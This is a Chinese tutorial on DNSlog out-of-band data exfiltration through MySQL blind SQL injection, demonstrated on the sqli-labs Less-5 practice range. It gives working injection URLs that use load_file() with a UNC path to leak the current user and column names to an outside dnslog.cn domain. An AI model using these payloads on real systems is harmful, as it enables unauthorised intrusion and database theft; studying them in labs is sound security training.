前置知识
DNS log即DNS日志,域名解析的记录
什么是dns解析呢
DNS解析是将域名转换为IP地址的过程。每个网站都有一个唯一的IP地址,但人们更容易记住网站的域名而不是IP地址。因此,当您在浏览器中输入域名时,计算机会向DNS服务器查询该域名对应的IP地址,然后将请求发送到该IP地址上的服务端。这个过程就是DNS解析。
配置文件 mysql.ini 中 secure_file_priv 参数需为空
secure_file_priv特性,有三种状态
secure_file_priv为null 表示不允许导入导出
secure_file_priv指定文件夹时,表示mysql的导入导出只能发生在指定的文件夹
secure_file_priv为空,则表示没有任何限制
所有其必须为空
利用工具有两个
http://www.dnslog.cn
http://ceye.io
load_file()函数
load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件
开始测试
我们以sql靶场第5关为例子,使用http://www.dnslog.cn
前面的就不多说,直接到关键步骤,因为是盲注,我们尝试外带
localhost:8089/Less-5/?id=-1' union select 1,load_file(concat('\\',hex(user()),'.ngntw2.dnslog.cn\abc')),3--+
其中\\实际是\因为需要转义,hex(user())为什么要hex,因为如果带出数据有@这类符号无法带出,ngntw2.dnslog.cn为获得的域名,abc随便取,无所谓
我们刷新就发现获得的东西了,然后去解码即可
后面的步骤就和sql注入一样了,比如查字段名
http://localhost:8089/Less-5/?id=?id=-1%27%20union%20select%201,load_file(concat(%27\\%27,hex((select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%22security%22%20and%20table_name=%22emails%22)),%27.ngntw2.dnslog.cn\abc%27)),3--+就不详细说了